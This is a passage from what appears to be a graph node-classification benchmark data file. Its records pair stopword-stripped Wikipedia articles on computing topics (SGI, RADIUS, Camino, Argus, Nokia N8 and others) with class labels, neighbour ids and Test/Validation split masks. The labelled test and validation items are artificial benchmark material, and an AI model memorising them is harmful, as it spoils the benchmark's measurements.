released 1996 rcp developed sgi nintendo operations department led engineer dr. wei yen 1997 twenty sgi employees led yen left sgi founded artx later acquired ati technologies 2000 1998 sgi relinquished ownership mips technologies inc re-ipo fully divested 2000 late 1990s much industry expected itanium replace cisc risc architectures non-embedded computers sgi announced intent phase mips systems development new mips microprocessors stopped existing r12000 design extended multiple times 2003 provide existing customers time migrate itanium august 2006 sgi announced end production mips/irix systems end year mips/irix products longer generally available sgi second generation onyx reality engine machines sgi offered access high performance 3d graphics subsystems proprietary api known iris graphics language iris gl features added years iris gl became harder maintain cumbersome use 1992 sgi decided clean reform iris gl made bold move allowing resulting opengl api cheaply licensed sgi competitors set industry-wide consortium maintain opengl standard opengl architecture review board meant first time fast efficient cross-platform graphics programs could written day opengl remains real-time 3d graphics standard portable across variety operating systems opengl-es even runs many types cell phones main competitor direct3d microsoft runs microsoft windows-based machines consoles sgi part advanced computing environment initiative formed early 1990s 20 companies including compaq digital equipment corporation mips computer systems groupe bull siemens nec netpower microsoft santa cruz operation intent introduce workstations based mips architecture able run windows nt sco unix group produced advanced risc computing arc specification began unravel little year formation sgi crimson system fsn three-dimensional file system navigator appeared 1993 movie jurassic park movie twister protagonists seen using sgi laptop computer however unit shown actual working computer rather fake laptop shell built around sgi corona lcd flat screen display 1995 film congo also features sgi laptop computer used dr. ross laura linney communicate via satellite travicom hq purple lowercased sgi logo seen beginning opening credits hbo series silicon valley taken replaced google logo intro graphics progress google leased former sgi buildings 2003 headquarters mountain view ca purchased buildings outright 2006 eight consecutive years 1995–2002 films nominated academy award distinguished achievement visual effects created silicon graphics computer systems inexpensive pcs began graphics performance close expensive specialized graphical workstations sgi core business sgi shifted focus high performance servers digital video web many sgi graphics engineers left work computer graphics companies ati nvidia contributing pc 3d graphics revolution 1995 film toy story used silicon graphics indigo2 computers create scenes movie sgi promoter free software supporting several projects linux samba opening previously proprietary code xfs filesystem open64 compiler 1995 sgi purchased alias research kroyer films wavefront technologies deal totaling approximately 500 million merged companies alias|wavefront june 2004 sgi sold business later renamed alias/wavefront private equity investment firm accel-kkr 57.1 million october 2005 autodesk announced signed definitive agreement acquire alias 182 million cash february 1996 sgi purchased well-known supercomputer manufacturer cray research 740 million began use marketing names craylink sgi-developed technology integrated sgi server line three months later sold cray business systems division responsible cs6400 sparc/solaris server sun microsystems undisclosed amount acknowledged later sun executive significantly less 100 million many cray t3e engineers designed developed sgi altix numalink technology sgi sold cray brand product lines tera computer company march 31 2000 35 million plus one million shares sgi also distributed remaining interest mips technologies spin-off effective june 20 2000 september 2000 sgi acquired zx10 series windows workstations servers intergraph computer systems rumored 100 million rebadged sgi systems product line discontinued june 2001 another attempt sgi late 1990s introduce family intel-based workstations running windows nt red hat linux see also sgi visual workstation proved financial disaster shook customer confidence sgi ’ commitment mips-based line 1998 sgi announced future generations machines would based mips processors upcoming super-chip intel code-named merced later called itanium funding high-end processors reduced planned r10000 would last mips mainstream processor mips technologies would focus entirely embedded market success sgi would longer fund development cpu since failure arc found use machines plan quickly went awry early 1999 clear itanium going delivered late would nowhere near performance originally expected production delays increased mips existing r10000-based machines grew increasingly uncompetitive eventually forced introduce faster mips processors r12000 r14000 r16000 used series models 2002 2006 sgi first itanium-based system short-lived sgi 750 workstation launched 2001 sgi mips-based systems superseded launch itanium 2-based altix servers prism workstations time later unlike mips systems ran irix itanium systems used suse linux enterprise server sgi enhancements operating system sgi used transitive corporation quicktransit software allow old mips/irix applications run emulation new itanium/linux platform server market itanium 2-based altix eventually replaced mips-based origin product line workstation market switch itanium completed sgi exited market altix powerful computer world 2006 assuming computer defined collection hardware running single instance operating system altix 512 itanium processors running single instance linux cluster 20 machines eighth-fastest supercomputer faster supercomputers clusters none many flops per machine however recent supercomputers large clusters machines individually less capable sgi acknowledged 2007 moved away massive numa model clusters although sgi continued market itanium-based machines recent machines based intel xeon processor first altix xe systems relatively low-end machines december 2006 xe systems capable itanium machines measures e.g. power consumption flops/w density flops/m cost/flops xe1200 xe1300 servers used cluster architecture departure pure numa architectures earlier itanium mips servers june 2007 sgi announced altix ice 8200 blade-based xeon system 512 xeon cores per rack altix ice 8200 installed new mexico computing applications center 14336 processors ranked number 3 top500 list november 2007 conventional wisdom holds sgi core market traditionally hollywood visual effects studios fact sgi largest revenue always generated government defense applications energy scientific technical computing one case silicon graphics largest single sale ever united states postal services usps sgi servers powered artificial intelligence ai program mechanically read tag sort mail hand-written block number usps key mail centers rise cheap yet powerful commodity workstations running linux windows mac os x availability diverse professional software effectively pushed sgi visual effects industry niche markets sgi continued enhance line servers including supercomputers based sn architecture sn scalable node technology developed sgi mid-1990s uses cache-coherent non-uniform memory access cc-numa sn system processors memory bus- memory-controller coupled together entity called node usually single circuit board nodes connected high-speed interconnect called numalink originally marketed craylink internal bus instead access processors memory i/o devices done switched fabric links routers thanks cache coherence distributed shared memory sn systems scale along several axes cpu count increases memory capacity i/o capacity system bisection bandwidth allows combined memory nodes accessed single os image using standard shared-memory synchronization methods makes sn system far easier program able achieve higher sustained-to-peak performance non-cache-coherent systems like conventional clusters massively parallel computers require applications code written re-written explicit message-passing communication nodes first sn system known sn-0 released 1996 product name origin 2000 based mips r10000 processor scaled 2 128 processors smaller version origin 200 sn-00 scaled 1 4 later enhancements enabled systems large 512 processors second generation system originally called sn-1 later sn-mips released july 2000 origin 3000 scaled 4 512 processors 1,024-processor configurations delivered special order customers smaller less scalable implementation followed called origin 300 november 2002 sgi announced repackaging sn system name origin 3900 quadrupled processor area density sn-mips system 32 128 processors per rack moving fat tree interconnect topology january 2003 sgi announced variant sn platform called altix 3000 internally called sn-ia used intel itanium 2 processors ran linux operating system kernel time released world scalable linux-based computer supporting 64 processors single system node nodes could connected using numalink technology form sgi predictably termed superclusters february 2004 sgi announced general support 128 processor nodes followed 256 512 processor versions year april 2004 sgi announced sale alias software business approximately 57 million october 2004 sgi built supercomputer columbia broke world record computer speed nasa ames research center cluster 20 altix supercomputers 512 intel itanium 2 processors running linux achieved sustained speed 42.7 trillion floating-point operations per second teraflops easily topping japan famed earth simulator record 35.86 teraflops week later ibm upgraded blue gene/l clocked 70.7 teraflops july 2006 sgi announced sgi altix 4700 system 1,024 processors 4 tb memory running single linux system image 68k mips-based models also rebadged vendors including cdc tandem computers prime computer siemens-nixdorf sgi onyx sgi indy series systems used game development nintendo 64",
    "neighbors": [
      8704,
      8711,
      7176,
      5141,
      2071,
      2073,
      11293,
      5156,
      6697,
      6187,
      7215,
      4144,
      5686,
      2620,
      7234,
      1606,
      2638,
      3662,
      2651,
      2652,
      7263,
      6243,
      3172,
      7269,
      6247,
      6250,
      2155,
      6252,
      6253,
      6256,
      7286,
      10871,
      1149,
      125,
      2687,
      2179,
      4228,
      4741,
      6791,
      9863,
      9353,
      7820,
      6797,
      143,
      7311,
      5272,
      5285,
      5293,
      3247,
      9391,
      3764,
      11447,
      1724,
      1212,
      4804,
      6852,
      6854,
      6858,
      9932,
      2264,
      221,
      9438,
      9955,
      5356,
      3323,
      5380,
      11013,
      7432,
      1801,
      2314,
      5898,
      783,
      8976,
      1809,
      5405,
      6942,
      6434,
      4902,
      7983,
      823,
      2361,
      11065,
      7998,
      1860,
      5956,
      10055,
      11604,
      4438,
      5462,
      7001,
      2394,
      2395,
      2909,
      6495,
      3938,
      1387,
      8051,
      1398,
      6006,
      1400,
      10104,
      4989,
      4479,
      1927,
      1933,
      5523,
      2452,
      7571,
      7573,
      2974,
      1952,
      5029,
      426,
      7594,
      9135,
      11184,
      11697,
      2995,
      7093,
      9151,
      9665,
      10691,
      1480,
      5076,
      11222,
      7134,
      4074,
      8682,
      4079,
      6128,
      6129,
      8179,
      7166
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10052,
    "label": 2,
    "text": "Apple_GS/OS:apple gs/os gs/os operating system developed apple computer apple ii personal computer uses prodos filing system provides facilities accessing file system controlling input/output devices loading running program files system allowing programs handle interrupts signals gs/os included component apple ii system software versions 4.0 6.0.1 gs/os unlike predecessor written entirely 16-bit code first true 16-bit operating system ii gs/os includes facility known file system translators fsts allows support multiple on-disk file systems manner transparent application programs feature found prodos microcomputer operating systems time usually used prodos file system one could booted gs/os also supports variety file systems including hierarchical file system used mac os file system translators addition prodos hfs include ms-dos high sierra/iso-9660 apple dos 3.3 pascal albeit read-only full read/write support planned never completed another advantage gs/os prodos 16 written 16-bit code 65816 processor used ii rather primarily 8-bit 6502 machine code take advantage ii unique features also extends prodos file system provide resource forks files similar used apple macintosh allows programs written flexible way big change previous versions prodos gs/os incorporates many features macintosh system 5 particular gs/os finder loadable fonts plug-in device drivers modem printer etc. command-line development environment called apw apple programmer workshop available much like macintosh programmer workshop",
    "neighbors": [
      2179,
      9732,
      10755,
      6023,
      6539,
      7307,
      4114,
      9762,
      11171,
      5413,
      11430,
      3241,
      6186,
      7983,
      3248,
      8114,
      8754,
      7991,
      9784,
      2363,
      7483,
      2365,
      2366,
      8767,
      576,
      11257,
      11513,
      8774,
      9166,
      5457,
      213,
      3286,
      1623,
      9308,
      7133,
      3167,
      3681,
      5093,
      6377,
      3948,
      4844,
      7281,
      3571,
      5363,
      5619,
      8441
    ],
    "mask": "Test"
  },
  {
    "node_id": 10053,
    "label": 2,
    "text": "Nokia_N8:nokia n8 nokia n8 touchscreen-based smartphone developed nokia announced 27 april 2010 nokia n8 first device run symbian^3 mobile operating system company flagship device year released 30 september 2010 nokia online store released markets around world 1 october 2010 n8 3.5-inch amoled display 16 gigabytes mass memory features 12-megapixel camera second time camera megapixel count used first one sony ericsson satio 2009 xenon flash like nokia n82 large 1/1.83 ” sensor size larger point-and-shoot cameras time also 720p hd video recording pentaband 3.5g radio fm transmitter among connectivity features hdmi output usb on-the-go wi-fi 802.11 b/g/n n8 important device nokia bid increasing competition smartphone industry revamped symbian^3 software also important device delayed several times pushing release date several months negative impact company despite mixed views symbian software n8 hardware build camera quality well received many calling best camera phone n8 would also become nokia last flagship device running symbian due nokia lumia 800 2011 ran windows phone software n8 symbian successor nokia 808 pureview appeared 2012 previous flagship phone nseries n97 criticised initial firmware issues anssi vanjoki nokia executive vice president markets said interview software quality control would better n97 n97 reception highly negative tarnished company image market n8 first device feature symbian^3 operating system initially scheduled second quarter 2010 n8 pushed back third quarter finally released 30 september 2010 due 'final amendments n8 became product customer pre-orders nokia history point release sales q4 2010 estimated almost 4 million previous nokia phone focus photography n86 8mp 8-megapixel sensor become available june 2009 n8 second nokia capacitive touchscreen following x6 first multi-touch nokia n8 dual charging options allowing charged standard-pin nokia charger micro-usb port nokia n8 battery compartment internally contained thus battery entirely straightforwardly removable replaceable users nonetheless although procedure endorsed nokia possible correct tool careful handling change battery. bl-4d 1200 mah lithium-ion battery n8 first nokia smartphone device run symbian^3 operating system 7 february 2012 nokia belle update available n8 nokia suite august year nokia also started roll nokia belle refresh update update brought new features symbian smartphone like html 5 web apps support new set home screen widgets software function n8 smartphone anna operating system update gave communicator support usually reserved e-series devices also new push notification api corresponding app proprietary web browser latest version 7.4.2.6 belle v.111.030.0609 official firmware including video-capturing feature complemented mini hdmi port located top side phone normally mirrors phone screen allows applications built-in video player nokia big screen app selected games output content resolutions 720p corresponding cable provided retail box regions nokia mobile tv headset provides dvb-h tv applications developed using nokia qt framework highlight capabilities nokia n8 camera nokia created short film commuter october 2010 directed mchenry brothers starring dev patel ed westwick charles dance pamela anderson seven-minute film shot entirely phone 720p camera spanish promotion phone also created short video featuring luminescent puppets called www.techfashy.com/2014/11/nokia-launches-their-first-android_18.html love knot phone also used film drums death wo n't long music video using cellscope technology nokia also released another film called dot marketed world smallest stop-motion animation character device also appeared popular showtime tv show dexter bbc tv series hustle well film also phone sarah lund uses third series killing .. asian countries promoted differently fictional character pier roxas nokia project gener8 young rubicam philippines also appeared gma talk show startalk promote device nokia shorts 2011 competition involved 8 short films shot nokia n8 winner splitscreen love story independent film olive first feature-length film 90 minutes made entirely cell phone uses nokia n8 along old fashioned video camera attachment 35 mm lens made exclusively device trick audience realizing made nokia n8",
    "neighbors": [
      1537,
      4609,
      11271,
      529,
      10770,
      5143,
      2072,
      5659,
      8735,
      4132,
      40,
      3626,
      5677,
      10802,
      7220,
      5175,
      1083,
      9292,
      7246,
      1615,
      5201,
      7253,
      5211,
      6748,
      4704,
      1121,
      1633,
      109,
      6276,
      3205,
      9359,
      659,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      690,
      7866,
      1216,
      1728,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      11487,
      737,
      9443,
      3300,
      4324,
      7399,
      8423,
      1776,
      8433,
      8472,
      11545,
      1833,
      7983,
      821,
      6996,
      854,
      10583,
      10599,
      6505,
      5998,
      8577,
      3462,
      11655,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      9137,
      7617,
      967,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10054,
    "label": 7,
    "text": "Livedrive:livedrive livedrive online cloud backup sync storage service owned j2 global company provides users unlimited backup space 2,000 gb sync storage livedrive enables users access data mobile phones tablets currently livedrive apps ios android windows macos chrome os livedrive founded late 2008 andrew michael another investor company nicholas cowell may 2009 three months product launched business offered £100 million buy-out company turned offer stating wanted build company october 2009 livedrive entered us market place via distribution agreement lifeboat distribution international speciality software distribution security application lifecycle virtualization network infrastructure products april 2011 livedrive created april fools video falsely stated company storing files paper using qr codes story picked several press sources true story including cbs money watch february 10 2014 livedrive purchased j2 global livedrive part j2 business cloud services division includes efax evoice fusemail campaigner keepitsafe shutting hundreds user accounts “ excessive bandwidth/storage ” livedrive reported august 2014 facing legal action discontented customers september 2010 livedrive added personal music movie streaming accounts gave users ability listen music collections watch movies remote computer transcoding handled livedrive company also gave users ftp access unlimited versioning",
    "neighbors": [
      6565,
      10185,
      6797,
      4623,
      7983,
      10161,
      5650,
      2267
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10055,
    "label": 4,
    "text": "Argus_–_Audit_Record_Generation_and_Utilization_System:argus – audit record generation utilization system argus – audit record generation utilization system first implementation network flow monitoring ongoing open source network flow monitor project started carter bullard 1984 georgia tech developed cyber security carnegie mellon university early 1990s argus important contributor internet cyber security technology 30 years argus project focused developing aspects large scale network situational awareness network audit trail establishment support network operations netops performance security management motivated telco call detail record cdr argus attempts generate network metadata used perform large number network management tasks argus used many universities corporations government entities including us disa dod dhs ffrdcs gloriad top 100 internet security tool argus designed real-time situational awareness system data used track alarm alert wire-line network conditions data also used establish comprehensive audit network traffic described red book us dod ncsc-tg-005 supplementing traditional intrusion detection system ids based network security audit trail traditionally used historical network traffic measurement data network forensics network behavior anomaly detection nbad argus used extensively cybersecurity end-to-end performance analysis recently software-defined networking sdn research argus also topic network management standards development rmon 1995 ipfix 2001 argus composed advanced comprehensive network flow data generator argus monitor processes packets either capture files live packet data generates detailed network traffic flow status reports flows packet stream argus monitors network traffic data plane control plane management plane internet protocol ip traffic argus captures much packet dynamics semantics flow great deal data reduction store process inspect analyze large amounts network data efficiently argus provides reachability availability connectivity duration rate load good-put loss jitter retransmission data networks delay metrics network flows captures attributes available packet contents layer 2 addresses tunnel identifiers mpls gre ipsec etc ... protocol ids sap hop-count options l4 transport identification rtp detection host flow control indications etc ... argus implemented number packet dynamics metrics specifically designed cyber security argus detects human typing behavior flow particular interest key-stroke detection encrypted ssh tunnels argus generates producer consumer ratio pcr indicates whether network entity data producer and/or consumer important property evaluating potential node involved advanced persistent threat apt mediated exfiltration argus open source gpl project owned managed qosient llc ported operating systems many hardware accelerated platforms bivio pluribus arista tilera software portable many environments little modifications performance auditing entire enterprise internet activity accomplished using modest computing resources",
    "neighbors": [
      5472,
      5559,
      9665,
      10051,
      1541,
      9381,
      939,
      9868,
      4303,
      823,
      3323,
      5245,
      3742
    ],
    "mask": "None"
  },
  {
    "node_id": 10056,
    "label": 3,
    "text": "PlayStation_2_sales:playstation 2 sales sony playstation 2 best-selling video game console time console sold slightly 500,000 units first day november 2000 marked industry record fastest-selling game console sony planned ship 100,000 units per week remainder year total 1.3 million end year planned ship three million units end march following year sony shipped 10 million consoles north america may 2002 holiday 2002 sales strong 8.5 million units november december 24 previous year sony expected shipments 2003 slip previous years sony projected shipments 20 million versus 22.5 year sony shipped 60 million units september 2003 26.4 million units went north america 19.4 million europe vast majority remaining 14.2 went japan 2004 although console took hit holiday 2003 sales previous year lifetime sales reached 70 million november 29 2005 playstation 2 became fastest game console reach 100 million units shipped accomplishing feat within 5 years 9 months launch achievement occurred faster predecessor playstation took 9 years 6 months reach benchmark europe ps2 sold 6 million units 2006 3.8 million 2007 according estimates ea 2007 ps2 sold 3.97 million units us according npd group 816,419 units japan according enterbrain 2008 ps2 sold 480,664 units japan according enterbrain october 2008 system sold 21 million units japan 150 million units ps2 hardware sold worldwide end 2010 although gameinformer noted units sold retail companies playstation 2 shipments japan ended december 28 2012 week later january 4 2013 sony computer entertainment formally discontinued console last week availability japan december 24 december 30 2012 playstation 2 sold 2,078 units country 928 units week remarkably playstation 2 managed sell better japan week xbox 360 1,986 units well nintendo ds 704 units ps2 sold 158 million units worldwide january 2013 europe sold 56 million units january 2013 according sony computer entertainment europe north america sold 53.65 million units january 2013 japan ps2 sold 23.18 million units january 2013 according famitsu /enterbrain",
    "neighbors": [
      643,
      9091,
      3077,
      10761,
      6799,
      9508,
      9512,
      684,
      306,
      1587,
      1091,
      6732,
      10316,
      6873,
      4060,
      607,
      359,
      488,
      8937,
      3824,
      5746,
      7801,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 10057,
    "label": 5,
    "text": "Camino_(web_browser):camino web browser camino spanish word meaning path discontinued free open source gui-based web browser based mozilla gecko layout engine specifically designed os x operating system place xul-based user interface used mozilla-based applications camino used mac-native cocoa apis may 30 2013 camino project announced browser longer developed camino aim integrate well possible os x used aqua user interface integrated number os x services features keychain password management bonjour scanning available bookmarks across local network notable features included integrated pop-up blocker ad blocker tabbed browsing included overview feature allowing tabs viewed pages browser developed camino project community organization mike pinkerton technical lead camino project since dave hyatt moved safari team apple inc. mid-2002 late 2001 mike pinkerton vidur apparao started project within netscape prove gecko could embedded cocoa application early 2002 dave hyatt one co-creators firefox called phoenix joined team built chimera small lightweight browser wrapper around work chimera mythological beast parts taken various animals new browser represented early example carbon/c++ code interacting cocoa/objective-c code name must seemed apt first downloadable build chimera 0.1 released february 13 2002 early releases became popular due fast page-loading speeds compared then-dominant mac browser microsoft internet explorer version 5 omnigroup omniweb used cocoa text system rendering engine hyatt hired apple computer mid-2002 start work would become safari meanwhile chimera developers got small team together within netscape dedicated development qa put together netscape-branded technology preview january 2003 macworld conference however two days show aol management decided abandon entire project despite setback skeleton crew qa developers released camino 0.7 march 3 2003 name changed chimera camino legal reasons roots greek mythology chimera popular choice name hypermedia systems one first graphical web browsers called chimera researchers university california irvine also developed complete hypermedia system name spanish path road el camino real aka royal road name chosen continue navigator motif version 0.7 primarily netscape-driven release kept afloat end open source version 0.8 according lead developer pinkerton triumph open source open process people around world helped patches qa bug triage localization artwork evangelism march 2005 camino web site moved mozilla foundation domain mozilla.org camino project domain caminobrowser.org september 2005 pinkerton accepted position google worked closely google firefox team continued work camino twenty percent time camino 1.0 released february 14 2006 first browser mozilla family appear universal binary thanks largely efforts mark mentovai another camino developers camino 2.0 released november 18 2009 introduced many new interface features browser including movable tabs tab preview first camino release acid2-compliant release camino 2.1 2011 developers announced plans transition webkit future versions mozilla dropped support gecko embedding final release 2.1.2 released march 14 2012 may 30 2013 stuart morgan announced camino blog camino reached end longer developed camino 2.0 released november 18 2009 introduced many new interface features browser including moveable tabs tab preview first camino release acid2-compliant current release 2.1.2 scores 99/100 acid3 test camino current html5 support via html5 test standards testbed limited camino 2.1.2 available following languages",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      2611,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      5707,
      10834,
      5205,
      6231,
      8281,
      2139,
      6747,
      6237,
      2149,
      1642,
      9834,
      10860,
      8303,
      9841,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      2182,
      6791,
      11418,
      10910,
      8351,
      7340,
      1713,
      9394,
      9908,
      7861,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      10470,
      4331,
      4844,
      9451,
      11000,
      8443,
      9987,
      7943,
      1295,
      1807,
      7951,
      2836,
      278,
      3350,
      10006,
      7965,
      1834,
      7983,
      7488,
      11082,
      10060,
      2893,
      10078,
      11112,
      4457,
      8557,
      7543,
      3961,
      6528,
      3971,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      10133,
      5536,
      5026,
      4013,
      944,
      5054,
      10174,
      9152,
      6086,
      4048,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10058,
    "label": 5,
    "text": "RADIUS:radius remote authentication dial-in user service radius networking protocol operating port 1812 provides centralized authentication authorization accounting aaa triple management users connect use network service radius developed livingston enterprises inc. 1991 access server authentication accounting protocol later brought internet engineering task force ietf standards broad support ubiquitous nature radius protocol often used internet service providers isps enterprises manage access internet internal networks wireless networks integrated e-mail services networks may incorporate modems digital subscriber line dsl access points virtual private networks vpns network ports web servers etc radius client/server protocol runs application layer use either tcp udp transport network access servers gateways control access network usually contain radius client component communicates radius server radius often back-end choice 802.1x authentication well radius server usually background process running unix microsoft windows server radius aaa protocol manages network access aaa stands authentication authorization accounting radius uses two packet types manage full aaa process access-request manages authentication authorization accounting-request manages accounting authentication authorization defined rfc 2865 accounting described rfc 2866 user machine sends request network access server nas gain access particular network resource using access credentials credentials passed nas device via link-layer protocol—for example point-to-point protocol ppp case many dialup dsl providers posted https secure web form turn nas sends radius access request message radius server requesting authorization grant access via radius protocol request includes access credentials typically form username password security certificate provided user additionally request may contain information nas knows user network address phone number information regarding user physical point attachment nas radius server checks information correct using authentication schemes pap chap eap user proof identification verified along optionally information related request user network address phone number account status specific network service access privileges historically radius servers checked user information locally stored flat file database modern radius servers refer external sources—commonly sql kerberos ldap active directory servers—to verify user credentials radius server returns one three responses nas 1 access reject 2 access challenge 3 access accept three radius responses may include reply-message attribute may give reason rejection prompt challenge welcome message accept text attribute passed user return web page authorization attributes conveyed nas stipulating terms access granted example following authorization attributes may included access-accept client configured use radius user client presents authentication information client might customizable login prompt user expected enter username password alternatively user might use link framing protocol point-to-point protocol ppp authentication packets carry information client obtained information may choose authenticate using radius client creates access- request containing attributes user name user password id client port id user accessing password present hidden using method based rsa message digest algorithm md5 accounting described rfc 2866 network access granted user nas accounting start radius accounting request packet containing acct-status-type attribute value start sent nas radius server signal start user network access start records typically contain user identification network address point attachment unique session identifier periodically interim update records radius accounting request packet containing acct-status-type attribute value interim-update may sent nas radius server update status active session interim records typically convey current session duration information current data usage finally user network access closed nas issues final accounting stop record radius accounting request packet containing acct-status-type attribute value stop radius server providing information final usage terms time packets transferred data transferred reason disconnect information related user network access typically client sends accounting-request packets receives accounting-response acknowledgement using retry interval primary purpose data user billed accordingly data also commonly used statistical purposes general network monitoring radius commonly used facilitate roaming isps example radius facilitates use realms identify radius server forward aaa requests processing realm commonly appended user user name delimited sign resembling email address domain name known postfix notation realm another common usage prefix notation involves prepending realm username using '\\ delimiter modern radius servers allow character used realm delimiter although practice '\\ usually used realms also compounded using prefix postfix notation allow complicated roaming scenarios example somedomain.com\\username anotherdomain.com could valid username two realms although realms often resemble domains important note realms fact arbitrary text need contain real domain names realm formats standardized rfc 4282 defines network access identifier nai form 'user realm specification 'realm portion required domain name however practice always followed rfc 7542 replaced rfc 4282 may 2015 radius server receives aaa request user name containing realm server reference table configured realms realm known server proxy request configured home server domain behavior proxying server regarding removal realm request stripping configuration-dependent servers addition proxying server configured add remove rewrite aaa requests proxied time proxy chaining possible radius authentication/authorization accounting packets usually routed nas device home server series proxies advantages using proxy chains include scalability improvements policy implementations capability adjustments roaming scenarios nas proxies home server could typically managed different administrative entities hence trust factor among proxies gains significance inter-domain applications absence end end security radius adds criticality trust among proxies involved proxy chains explained roaming radius exposes users various security privacy concerns generally roaming partners establish secure tunnel radius servers ensure users credentials intercepted proxied across internet concern md5 hash built radius considered insecure radius packet data format shown right fields transmitted left right starting code identifier length authenticator attributes radius codes decimal assigned follows identifier field aids matching requests replies length field indicates length entire radius packet including code identifier length authenticator optional attribute fields authenticator used authenticate reply radius server used encrypting passwords length 16 bytes radius attribute value pairs avp carry data request response authentication authorization accounting transactions length radius packet used determine end avps radius extensible many vendors radius hardware software implement variants using vendor-specific attributes vsas microsoft published vsas vsa definitions many companies remain proprietary and/or ad-hoc nonetheless many vsa dictionaries found downloading source code open source radius implementations example freeradius openradius radius protocol transmits obfuscated passwords using shared secret md5 hashing algorithm particular implementation provides weak protection user credentials additional protection ipsec tunnels physically secured data-center networks used protect radius traffic nas device radius server additionally user security credentials part protected radius yet user-specific attributes tunnel-group ids vlan memberships passed radius may considered sensitive helpful attacker private sufficient identify individual client information well radsec protocol claims solve aforementioned security issues dial-up customers used nsfnet request proposal sent merit network 1991 consolidate various proprietary authentication authorization accounting systems among early respondents livingston enterprises early version radius written meeting early radius server installed unix operating system livingston enterprises acquired lucent together merit steps taken gain industry acceptance radius protocol companies offered radius server charge radius 1997 published rfc 2058 rfc 2059 current versions rfc 2865 rfc 2866 original radius standard specified radius stateless run user datagram protocol udp authentication envisaged radius support password authentication protocol pap challenge-handshake authentication protocol chap point-to-point protocol passwords hidden taking md5 hash packet shared secret xoring hash password original radius also provided 50 attribute value pairs possibility vendors configure pairs choice hop-by-hop security model rather end-to-end encryption meant several proxy radius servers use every server must examine perform logic pass data request exposes data passwords certificates every hop radius servers also ability stop access resources authorisation issued subsequent standards rfc 3576 successor rfc 5176 allowed radius servers dynamically change users authorization disconnect user entirely several commercial open-source radius servers exist features vary look users text files ldap servers various databases etc accounting records written text files various databases forwarded external servers etc snmp often used remote monitoring keep-alive checking radius server radius proxy servers used centralized administration rewrite radius packets fly security reasons convert vendor dialects diameter protocol intended replacement radius authentication authorization accounting aaa protocols use-cases two protocols since diverged diameter largely used 3g space radius used elsewhere one largest barriers diameter replace radius switches access points typically implement radius diameter diameter uses sctp tcp radius typically uses udp transport layer 2012 radius also use tcp transport layer tls security radius protocol currently defined following ietf rfc documents",
    "neighbors": [
      10242,
      7,
      10271,
      2080,
      2083,
      2085,
      2087,
      562,
      4663,
      3064,
      3133,
      5181,
      8265,
      4687,
      1618,
      2134,
      10332,
      6750,
      2143,
      1121,
      1125,
      10341,
      10344,
      10863,
      4725,
      5749,
      9336,
      649,
      9868,
      3218,
      4242,
      3732,
      9365,
      11413,
      3742,
      9380,
      9381,
      3751,
      168,
      3752,
      10923,
      10924,
      10413,
      2228,
      9909,
      4797,
      7364,
      8391,
      7368,
      5843,
      225,
      2274,
      9442,
      6888,
      8432,
      6904,
      5373,
      6401,
      7426,
      3847,
      10005,
      1304,
      5402,
      7983,
      5433,
      5437,
      2887,
      6993,
      2904,
      8539,
      5469,
      5470,
      5471,
      5472,
      11112,
      367,
      2430,
      4999,
      3477,
      1433,
      5531,
      929,
      9635,
      9640,
      2996,
      10171,
      3006,
      5568,
      11210,
      2509,
      8654,
      6098,
      4053,
      5077,
      8670,
      5093,
      2027,
      1012,
      5624,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 10059,
    "label": 3,
    "text": "FlockDB:flockdb flockdb open-source distributed fault-tolerant graph database managing wide shallow network graphs initially used twitter store relationships users e.g followings favorites flockdb differs graph databases e.g neo4j designed multi-hop graph traversal rather rapid set operations unlike primary use-case redis sets since still process packaged outside twitter use code still rough hence stable release available yet flockdb posted github shortly twitter released gizzard framework uses query flockdb distributed datastore database licensed apache license",
    "neighbors": [
      9922,
      9631,
      10602,
      5677,
      5072,
      9245,
      7347,
      11221,
      3705,
      3485,
      7359
    ],
    "mask": "None"
  },
  {
    "node_id": 10060,
    "label": 5,
    "text": "CCSO_Nameserver:ccso nameserver ccso name-server ph protocol early form database search internet common form used look information telephone numbers email addresses today service largely replaced ldap used mainly early-to-middle 1990s name-server developed steve dorner university illinois urbana–champaign university computing communications services office ccso also exists outlook plugin standalone application known outlookph name-server directories frequently organized gopher hierarchies tools ph qi two components system ph client queried qi server ph protocol formally defined september 1998 however memo issued time references prior use unspecified period time date defines sixteen keywords used server side define record properties also defines clients access records server responses server give ph server communication takes place tcp port 105 commands response initially assumed us-ascii encoding historical reasons unless client explicitly asks 8-bit iso-8859-1 encoding result characters 0x20 0x7e initially sent server raw form characters present entries escaped using defined quoted-printable encoding initial request client text base keyword optionally followed one parameters defined server responds request following example response status request provided rfc memo command defined memo consists keyword followed needed one parameters key words separated spaces tabs end line line must terminated cr+lf style following commands command takes parameters simply asks server report status returns information server version mail domain contact password issues authentication methods list available entry fields server specified name names causes server log specified information current user id without login sets specified option server value used without parameters lists current server settings actual login/logout commands server alias must users ph alias logging allows user change entry view certain fields flag restricted access client normally uses one send password information login command sent one recognized server end session command closing connection distributed nameserver backed flat file database early 1990s indiana university software developer larry hughes implemented version qi called phd written perl backed relational database code distributed open-source license several years prior university transition ldap",
    "neighbors": [
      6657,
      8582,
      7943,
      9757,
      10910,
      3110,
      10791,
      10924,
      9908,
      4661,
      10808,
      5054,
      10174,
      9286,
      10057,
      6993,
      4310,
      5078,
      6231,
      10722,
      494,
      8443,
      1520,
      9843,
      6133,
      3191,
      3961,
      5114,
      6651,
      637
    ],
    "mask": "Test"
  },
  {
    "node_id": 10061,
    "label": 9,
